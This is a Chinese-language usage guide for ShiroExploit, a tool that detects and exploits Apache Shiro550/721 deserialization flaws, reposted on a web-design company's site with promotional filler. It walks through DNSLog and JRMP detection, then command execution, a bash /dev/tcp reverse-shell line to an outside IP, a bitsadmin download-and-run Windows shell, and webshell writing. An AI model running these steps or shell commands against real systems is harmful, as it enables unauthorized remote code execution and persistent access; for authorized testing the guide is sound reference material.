Shiro漏洞檢測(cè)工具ShiroExploit怎么使用

本篇內(nèi)容主要講解“Shiro漏洞檢測(cè)工具ShiroExploit怎么使用”,感興趣的朋友不妨來(lái)看看。本文介紹的方法操作簡(jiǎn)單快捷,實(shí)用性強(qiáng)。下面就讓小編來(lái)帶大家學(xué)習(xí)“Shiro漏洞檢測(cè)工具ShiroExploit怎么使用”吧!

10年積累的網(wǎng)站設(shè)計(jì)、成都網(wǎng)站建設(shè)經(jīng)驗(yàn),可以快速應(yīng)對(duì)客戶對(duì)網(wǎng)站的新想法和需求。提供各種問(wèn)題對(duì)應(yīng)的解決方案。讓選擇我們的客戶得到更好、更有力的網(wǎng)絡(luò)服務(wù)。我雖然不認(rèn)識(shí)你,你也不認(rèn)識(shí)我。但先網(wǎng)站制作后付款的網(wǎng)站建設(shè)流程,更有高港免費(fèi)網(wǎng)站建設(shè)讓你可以放心的選擇與我們合作。

ShiroExploit

支持對(duì)Shiro550(硬編碼秘鑰)和Shiro721(Padding Oracle)的一鍵化檢測(cè),支持簡(jiǎn)單回顯。

使用說(shuō)明

第一步:按要求輸入要檢測(cè)的目標(biāo)URL和選擇漏洞類型

  • Shiro550 無(wú)需提供rememberMe Cookie, Shiro721 需要提供一個(gè)有效的rememberMe Cookie
  • Shiro550 無(wú)需選擇操作系統(tǒng)類型, Shiro721 需要選擇操作系統(tǒng)類型
  • 可以手工指定特定的 Key 和 Gadget,默認(rèn)不指定,會(huì)遍歷所有的 Key 和 Gadget
  • 復(fù)雜Http請(qǐng)求支持直接粘貼數(shù)據(jù)包

Shiro漏洞檢測(cè)工具ShiroExploit怎么使用

第二步: 選擇攻擊方式


Shiro漏洞檢測(cè)工具ShiroExploit怎么使用

選擇使用 ceye.io 進(jìn)行漏洞檢測(cè)
  • 可以不進(jìn)行任何配置,配置文件中已經(jīng)預(yù)置了 CEYE 域名和對(duì)應(yīng)的 Token,當(dāng)然也可以對(duì)其進(jìn)行修改。
  • 程序會(huì)首先使用  URLDNS  篩選出唯一 Key,然后依次調(diào)用各個(gè) Gadget 生成 Payload
  • 缺點(diǎn):程序會(huì)使用 API: http://api.ceye.io/v1/records?token=a78a1cb49d91fe09e01876078d1868b2&type=dns&filter=[UUID]  查詢檢測(cè)結(jié)果,這個(gè) API 有時(shí)候會(huì)無(wú)法正常訪問(wèn),導(dǎo)致在這種方式下無(wú)法找到 Key 或者有效的 Gadget
選擇 使用 dnslog.cn 進(jìn)行漏洞檢測(cè)
  • 可以不進(jìn)行任何配置,每次啟動(dòng)時(shí)程序會(huì)自動(dòng)從  dnslog.cn  申請(qǐng)一個(gè) DNS Record。
  • 程序會(huì)首先使用  URLDNS  篩選出唯一 Key,然后依次調(diào)用各個(gè) Gadget 生成 Payload
  • 缺點(diǎn):少數(shù)時(shí)候 dnslog.cn 會(huì)間隔較久才顯示 DNS 解析結(jié)果導(dǎo)致程序無(wú)法找到 Key 或者有效的 Gadget,且 dnslog.cn 只會(huì)記錄最近的10條 DNS 解析記錄
選擇 使用 JRMP + dnslog 進(jìn)行漏洞檢測(cè)
  • 需要在 vps 上通過(guò)命令 java -cp ShiroExploit.jar com.shiroexploit.server.BasicHTTPServer [HttpSerivce Port] [JRMPListener Port] 開(kāi)啟HttpService/JRMPListener,并按照要求填入相應(yīng) IP 和端口
  • 如果開(kāi)啟 HttpService/JRMPListener 時(shí)未指定端口號(hào),則  HTTPService  默認(rèn)監(jiān)聽(tīng)  8080  端口, JRMPListener  默認(rèn)監(jiān)聽(tīng)  8088  端口
  • 使用  JRMP  的方式進(jìn)行漏洞檢測(cè),可以顯著減小 cookie 大小
  • 程序會(huì)首先使用  URLDNS  篩選出唯一 Key,然后使用  JRMP  依次為各個(gè) Gadget 生成對(duì)應(yīng)的 JRMPListener
選擇 使用回顯進(jìn)行漏洞檢測(cè)
  • 針對(duì)不出網(wǎng)的情況進(jìn)行漏洞檢測(cè),此時(shí)可以檢測(cè)的 Gadget 類型會(huì)少于使用 DNSLog 方式的 Gadget類型
  • 目前主要是通過(guò)將命令執(zhí)行結(jié)果寫(xiě)入 Web 目錄下然后讀取的方式實(shí)現(xiàn)回顯
  • 需要提供一個(gè)靜態(tài)資源 URL,程序會(huì)將此靜態(tài)資源所在的目錄當(dāng)做寫(xiě)入目錄
  • 注:開(kāi)始的時(shí)候使用  https://blog.csdn.net/fnmsd/article/details/106709736  介紹的方式實(shí)現(xiàn)回顯,在本地可以測(cè)試成功,但是在實(shí)際環(huán)境中基本不成功(可能是我的姿勢(shì)有問(wèn)題,歡迎探討),所以目前是通過(guò)讀寫(xiě)文件的方式實(shí)現(xiàn)回顯,后期可能會(huì)加入其它方式

第三步:檢測(cè)漏洞并執(zhí)行命令

  • 程序在判斷目標(biāo)應(yīng)用是否存在漏洞時(shí),窗口上部的輸入框無(wú)法進(jìn)行輸入。當(dāng)程序檢測(cè)出目標(biāo)應(yīng)用存在漏洞時(shí),輸入框可以進(jìn)行輸入并執(zhí)行命令。
  • 反彈shell(linux)  采用  bash -i >& /dev/tcp/1.2.3.4/443 0>&1  的方式反彈 shell
  • 反彈shell(Windows)  采用  bitsadmin  下載指定 URL 的 exe 文件并執(zhí)行的方式獲取 shell

Shiro漏洞檢測(cè)工具ShiroExploit怎么使用

  • 獲取Webshell  可以在能夠回顯的情況下直接在使用者給出的路徑(目錄需要真實(shí)存在)下寫(xiě)入 webshell, webshell 名稱和后綴名由使用者自行指定,webshell 的內(nèi)容從 config 目錄下的 shell.jsp 中讀取

Shiro漏洞檢測(cè)工具ShiroExploit怎么使用

備注

在使用漏洞檢測(cè)主程序或者開(kāi)啟 HttpService/JRMPListener 時(shí),均需要ysoserial.jar的支持,將ysoserial.jar和ShiroExploit.jar放置在同一目錄即可。

到此,相信大家對(duì)“Shiro漏洞檢測(cè)工具ShiroExploit怎么使用”有了更深的了解,不妨來(lái)實(shí)際操作一番吧!這里是創(chuàng)新互聯(lián)網(wǎng)站,更多相關(guān)內(nèi)容可以進(jìn)入相關(guān)頻道進(jìn)行查詢,關(guān)注我們,繼續(xù)學(xué)習(xí)!

當(dāng)前標(biāo)題:Shiro漏洞檢測(cè)工具ShiroExploit怎么使用
網(wǎng)站鏈接:http://muchs.cn/article32/gdiipc.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供做網(wǎng)站、手機(jī)網(wǎng)站建設(shè)、虛擬主機(jī)、網(wǎng)站建設(shè)、靜態(tài)網(wǎng)站、網(wǎng)站收錄

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)

搜索引擎優(yōu)化